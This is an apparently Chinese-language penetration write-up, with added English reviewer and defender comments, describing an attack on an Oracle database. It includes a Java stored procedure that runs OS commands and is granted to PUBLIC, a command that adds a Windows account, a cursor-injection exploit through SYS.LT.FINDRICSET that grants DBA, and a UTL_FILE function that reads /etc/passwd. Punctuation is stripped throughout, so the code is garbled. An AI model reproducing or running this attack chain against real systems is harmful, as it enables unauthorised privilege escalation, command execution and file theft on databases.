很快便连接上 Oracle 服务器，此时发现
连接后不是 DBA 权限，
不能利用 SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES 漏洞提升权限。
运行 `SELECT UTL_HTTP.request(…) FROM dual` 后，发现 Oracle 服务器不能连接网络。
幸运的是，运行
create or replace function Linx_Query (p varchar) return number authid current_user is begin execute immediate p; return ;end;
成功！这个用户具有 CREATE PROCEDURE 权限。
此时马上想到创建 Java 扩展来执行命令。
create or replace and compile java source named LinxUtil as import javaio*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( RuntimegetRuntime()exec(args)getInputStream() ) ); String stempstr=;while ((stemp = myReaderreadLine()) != null) str +=stemp+ ;myReaderclose();return str;} catch (Exception e){return etoString();}}}
begin dbms_javagrant_permission(PUBLIC SYS:javaioFilePermission <> execute );end;
create or replace function LinxRunCMD(p_cmd in varchar) return varchar as language java name LinxUtilrunCMD(javalangString) return String
-- Three follow-up statements: a check that the LINX* objects were created,
-- a GRANT ALL ... TO PUBLIC that exposes the command runner to every account,
-- and a call that would run a Windows OS command (net user ... /add, i.e.
-- creation of a local OS account) through the database.
-- Defender notes: GRANT ... TO PUBLIC on a user-defined function is itself an
-- indicator worth alerting on; the OS-side effects (cmd.exe spawned by the
-- Oracle service process, a new local account) are visible to host auditing
-- even if database auditing is off.
select * from all_objects where object_name like %LINX%
grant all on LinxRunCMD to public
select LinxRunCMD(cmd /c net user linx /add) from dual
但是在第一步就卡住了：服务器由于某种未知原因，不能创建 Java 扩展！
还好我们还有 UTL_FILE 包可以利用。
-- Reads an entire file through UTL_FILE from the UTL_FILE_DIR directory object
-- and returns it as a single VARCHAR with a separator character after each
-- line. The caller needs read access on that directory object; the note below
-- says the call failed for lack of privilege before escalation.
-- NOTE(review): `varchar()` and `chr()` lost their size/argument in
-- extraction; the code is left as found.
create or replace function LinxUTLReadfile (filename varchar) return varchar is
fHandler UTL_FILEFILE_TYPE;   -- UTL_FILE.FILE_TYPE handle for the open file
buf varchar();                -- one line as returned by GET_LINE
output varchar();             -- accumulated file contents
BEGIN
fHandler := UTL_FILEFOPEN(UTL_FILE_DIR filename r);   -- open for reading under the directory object
loop
begin
utl_fileget_line(fHandlerbuf);
DBMS_OUTPUTPUT_LINE(Cursor: ||buf);   -- debug echo of each line; the "Cursor:" label is probably copied from the cursor block below
exception
when no_data_found then exit;   -- end of file: leave the loop
end;
output := output||buf||chr();   -- append line plus separator
end loop;
-- NOTE(review): only NO_DATA_FOUND is handled inside the loop. Any other error
-- (for example if output outgrows its declared size) propagates past this
-- FCLOSE and leaks the file handle; a WHEN OTHERS handler that closes
-- fHandler and re-raises would avoid that.
UTL_FILEFCLOSE(fHandler);
return output;
END;
UTL_FILE_DIR需要先用
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc;
指定目录，但运行后发现没有权限，只好想办法提权。
***************游标注射***************
老外写了 N 个 PDF 介绍这项技术，我精简了代码。
-- Cursor-injection privilege escalation, as an anonymous PL/SQL block.
-- 1. A DBMS_SQL cursor is opened and PARSED (not executed) with a PL/SQL block
--    that, inside an autonomous transaction, GRANTs DBA to a named account —
--    apparently the caller's own, judging by the garbled trailing note.
-- 2. A string containing dbms_sql.execute(<that cursor>) is concatenated into
--    the argument of SYS.LT.FINDRICSET. The escalation depends on that
--    SYS-owned definer-rights procedure building dynamic SQL from its argument,
--    so the deferred cursor ends up executing with SYS privileges (mechanism
--    inferred from the call shape; the "–x" tail looks like a garbled "--"
--    comment terminator).
-- 3. The RAISE and both handlers only print the cursor number, so any error
--    from step 2 is masked; DBMS_SQL.CLOSE_CURSOR is never called.
-- Defender notes: apply the vendor fixes covering this procedure; restrict
-- EXECUTE on SYS.LT (Workspace Manager) to accounts that need it; audit GRANT
-- DBA and other powerful-role grants, DBMS_SQL use from low-privilege sessions,
-- and calls into SYS.LT.* by non-administrative users.
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQLOPEN_CURSOR;   -- DBMS_SQL.OPEN_CURSOR
DBMS_SQLPARSE(MYCdeclare pragma autonomous_transaction; begin execute immediate GRANT DBA TO linxlinx_current_db_user;commit;end;);   -- parsed only; executes later, under SYS
DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);   -- echo the cursor number
BEGIN SYSLTFINDRICSET(||dbms_sqlexecute( ||MYC|| )||)–x); END;   -- injection point: cursor execution smuggled into a SYS procedure's argument
raise NO_DATA_FOUND;   -- force the handler path regardless of outcome
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);
WHEN OTHERS THEN DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);   -- swallows any error from the SYS.LT call
END;
运行后重新连接就有 DBA 权限了，简单吧……
现在可以读取文件了
-- With DBA now held, the directory object is (re)created over /etc and the
-- UTL_FILE reader defined above is pointed at passwd: an OS file read from
-- inside the database, bounded only by the OS account the instance runs as.
-- Detection: CREATE DIRECTORY statements and UTL_FILE opens of non-database
-- paths in the audit trail; host-level file-access auditing on the Oracle
-- process.
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc;
select LinxUTLReadfile(passwd) from dual
后面就简单了，不写了。